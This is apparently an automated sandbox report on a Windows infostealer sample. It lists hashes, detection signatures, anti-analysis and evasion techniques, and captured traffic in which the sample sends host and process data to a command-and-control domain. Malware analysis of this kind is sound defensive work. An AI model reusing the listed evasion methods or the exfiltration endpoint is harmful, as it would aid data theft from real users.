Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
2M43DSi2cx.exe

Overview

General Information

Sample name:2M43DSi2cx.exe
renamed because original name is a hash value
Original sample name:98f2f2f0d74571af72dd4ca43c1692bf.exe
Analysis ID:1578929
MD5:98f2f2f0d74571af72dd4ca43c1692bf
SHA1:507cac98014412c6e697ea75f3c1941bad57df48
SHA256:dfe46285484362af5dc63dd0bba5de89c1c1d7105f7e8d05b2514fa39ac3750a
Tags:exeuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Potentially malicious time measurement code found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to create an SMB header
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • 2M43DSi2cx.exe (PID: 7688 cmdline: "C:\Users\user\Desktop\2M43DSi2cx.exe" MD5: 98F2F2F0D74571AF72DD4CA43C1692BF)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: 2M43DSi2cx.exeAvira: detected
Multi AV Scanner detection for submitted file
Source: 2M43DSi2cx.exeVirustotal: Detection: 51%Perma Link
Source: 2M43DSi2cx.exeReversingLabs: Detection: 42%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: 2M43DSi2cx.exeJoe Sandbox ML: detected
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: -----BEGIN PUBLIC KEY-----0_2_0044DCF0
Source: 2M43DSi2cx.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: mov dword ptr [ebp+04h], 424D53FFh0_2_0048A5B0
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_0048A7F0
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: mov dword ptr [edi+04h], 424D53FFh0_2_0048A7F0
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: mov dword ptr [esi+04h], 424D53FFh0_2_0048A7F0
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: mov dword ptr [edi+04h], 424D53FFh0_2_0048A7F0
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: mov dword ptr [esi+04h], 424D53FFh0_2_0048A7F0
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_0048A7F0
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_0048B560
Source: 2M43DSi2cx.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_2_0042255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0042255D
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_2_004229FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_004229FF
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: POST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1Host: home.fivetk5ht.topAccept: */*Content-Type: application/jsonContent-Length: 501222Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 30 39 34 38 32 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3
Source: global trafficHTTP traffic detected: POST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1Host: home.fivetk5ht.topAccept: */*Content-Type: application/jsonContent-Length: 143Data Raw: 7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 5c 2f 68 31 3e 5c 6e 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 5c 6e 3c 5c 2f 62 6f 64 79 3e 3c 5c 2f 68 74 6d 6c 3e 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "<html><body><h1>503 Service Unavailable<\/h1>\nNo server is available to handle this request.\n<\/body><\/html>\n", "data": "Done1" }
Source: Joe Sandbox ViewIP Address: 185.121.15.192 185.121.15.192
Source: Joe Sandbox ViewIP Address: 34.226.108.155 34.226.108.155
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_2_004EA8C0 recvfrom,0_2_004EA8C0
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficDNS traffic detected: DNS query: httpbin.org
Source: global trafficDNS traffic detected: DNS query: home.fivetk5ht.top
Source: unknownHTTP traffic detected: POST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1Host: home.fivetk5ht.topAccept: */*Content-Type: application/jsonContent-Length: 501222Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 30 39 34 38 32 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3
Source: 2M43DSi2cx.exe, 00000000.00000003.1329725523.00000000071A6000.00000004.00001000.00020000.00000000.sdmp, 2M43DSi2cx.exe, 00000000.00000002.1424245644.00000000009FD000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://.css
Source: 2M43DSi2cx.exe, 00000000.00000003.1329725523.00000000071A6000.00000004.00001000.00020000.00000000.sdmp, 2M43DSi2cx.exe, 00000000.00000002.1424245644.00000000009FD000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://.jpg
Source: 2M43DSi2cx.exe, 00000000.00000003.1414353733.0000000001500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fivetk5ht.top/zldPR
Source: 2M43DSi2cx.exe, 00000000.00000002.1424245644.00000000009FD000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv17
Source: 2M43DSi2cx.exe, 00000000.00000002.1425461490.00000000014B7000.00000004.00000020.00020000.00000000.sdmp, 2M43DSi2cx.exe, 00000000.00000003.1414372045.00000000014B5000.00000004.00000020.00020000.00000000.sdmp, 2M43DSi2cx.exe, 00000000.00000002.1424245644.00000000009FD000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
Source: 2M43DSi2cx.exe, 00000000.00000002.1425461490.00000000014B7000.00000004.00000020.00020000.00000000.sdmp, 2M43DSi2cx.exe, 00000000.00000003.1414372045.00000000014B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv17345798514
Source: 2M43DSi2cx.exe, 00000000.00000002.1425461490.00000000014B7000.00000004.00000020.00020000.00000000.sdmp, 2M43DSi2cx.exe, 00000000.00000003.1414372045.00000000014B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv17345798514fd4
Source: 2M43DSi2cx.exe, 00000000.00000002.1424245644.00000000009FD000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851http://home.fivetk5ht.top/zldPRFrmVFHTtKntGp
Source: 2M43DSi2cx.exe, 00000000.00000003.1329725523.00000000071A6000.00000004.00001000.00020000.00000000.sdmp, 2M43DSi2cx.exe, 00000000.00000002.1424245644.00000000009FD000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://html4/loose.dtd
Source: 2M43DSi2cx.exe, 00000000.00000002.1424245644.00000000009FD000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: 2M43DSi2cx.exeString found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: 2M43DSi2cx.exe, 00000000.00000002.1424245644.00000000009FD000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
Source: 2M43DSi2cx.exeString found in binary or memory: https://curl.se/docs/hsts.html#
Source: 2M43DSi2cx.exe, 2M43DSi2cx.exe, 00000000.00000003.1329725523.00000000071A6000.00000004.00001000.00020000.00000000.sdmp, 2M43DSi2cx.exe, 00000000.00000002.1424245644.00000000009FD000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: 2M43DSi2cx.exeString found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: 2M43DSi2cx.exe, 00000000.00000003.1329725523.00000000071A6000.00000004.00001000.00020000.00000000.sdmp, 2M43DSi2cx.exe, 00000000.00000002.1424245644.00000000009FD000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://httpbin.org/ip
Source: 2M43DSi2cx.exe, 00000000.00000003.1329725523.00000000071A6000.00000004.00001000.00020000.00000000.sdmp, 2M43DSi2cx.exe, 00000000.00000002.1424245644.00000000009FD000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://httpbin.org/ipbefore
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713

System Summary

barindex
PE file contains section with special chars
Source: 2M43DSi2cx.exeStatic PE information: section name:
Source: 2M43DSi2cx.exeStatic PE information: section name: .idata
Source: 2M43DSi2cx.exeStatic PE information: section name:
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_3_015195710_3_01519571
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_3_015195710_3_01519571
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_3_014C89940_3_014C8994
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_3_015195710_3_01519571
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_3_015195710_3_01519571
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_3_014C89940_3_014C8994
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_3_015195710_3_01519571
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_3_015195710_3_01519571
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_2_004305B00_2_004305B0
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_2_00436FA00_2_00436FA0
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_2_0045F1000_2_0045F100
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_2_004EB1800_2_004EB180
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_2_007AE0300_2_007AE030
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_2_004F00E00_2_004F00E0
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_2_004862100_2_00486210
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_2_004EC3200_2_004EC320
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_2_007744100_2_00774410
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_2_004F04200_2_004F0420
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_2_0042E6200_2_0042E620
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_2_004EC7700_2_004EC770
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_2_007867300_2_00786730
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_2_0048A7F00_2_0048A7F0
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_2_007A47800_2_007A4780
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_2_004349400_2_00434940
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_2_0042A9600_2_0042A960
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_2_004DC9000_2_004DC900
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_2_005F6AC00_2_005F6AC0
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_2_006DAAC00_2_006DAAC0
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_2_005B4B600_2_005B4B60
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_2_006DAB2C0_2_006DAB2C
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_2_00798BF00_2_00798BF0
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_2_0042CBB00_2_0042CBB0
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_2_007ACC700_2_007ACC70
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_2_007A4D400_2_007A4D40
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_2_005E0D800_2_005E0D80
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_2_0079CD800_2_0079CD80
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_2_0073AE300_2_0073AE30
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_2_00444F700_2_00444F70
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_2_004EEF900_2_004EEF90
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_2_004E8F900_2_004E8F90
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_2_00772F900_2_00772F90
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_2_004310E60_2_004310E6
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_2_0078D4300_2_0078D430
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_2_007935B00_2_007935B0
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_2_007B17800_2_007B1780
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_2_004D98800_2_004D9880
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_2_007799200_2_00779920
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_2_007A3A700_2_007A3A70
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_2_00461BE00_2_00461BE0
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_2_00791BD00_2_00791BD0
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_2_00787CC00_2_00787CC0
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_2_006D9C800_2_006D9C80
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_2_00435DB00_2_00435DB0
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_2_00433ED00_2_00433ED0
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_2_00445EB00_2_00445EB0
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_2_007A9FE00_2_007A9FE0
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: String function: 004275A0 appears 710 times
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: String function: 00464F40 appears 348 times
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: String function: 005D7220 appears 103 times
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: String function: 00465340 appears 50 times
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: String function: 00464FD0 appears 289 times
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: String function: 005044A0 appears 76 times
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: String function: 004650A0 appears 101 times
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: String function: 0043CD40 appears 80 times
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: String function: 0042CAA0 appears 64 times
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: String function: 004271E0 appears 47 times
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: String function: 0043CCD0 appears 55 times
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: String function: 005FCBC0 appears 104 times
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: String function: 0042C960 appears 37 times
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: String function: 004273F0 appears 114 times
Source: 2M43DSi2cx.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: 2M43DSi2cx.exeStatic PE information: Section: zicceeoj ZLIB complexity 0.9945489857763453
Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@6/2
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_2_0042255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0042255D
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_2_004229FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_004229FF
Source: C:\Users\user\Desktop\2M43DSi2cx.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\2M43DSi2cx.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\2M43DSi2cx.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\2M43DSi2cx.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\2M43DSi2cx.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: 2M43DSi2cx.exeVirustotal: Detection: 51%
Source: 2M43DSi2cx.exeReversingLabs: Detection: 42%
Source: 2M43DSi2cx.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: 2M43DSi2cx.exeString found in binary or memory: Unable to complete request for channel-process-startup
Source: C:\Users\user\Desktop\2M43DSi2cx.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\2M43DSi2cx.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\2M43DSi2cx.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\2M43DSi2cx.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\2M43DSi2cx.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\2M43DSi2cx.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\2M43DSi2cx.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\2M43DSi2cx.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\2M43DSi2cx.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\2M43DSi2cx.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\2M43DSi2cx.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\2M43DSi2cx.exeSection loaded: wshbth.dllJump to behavior
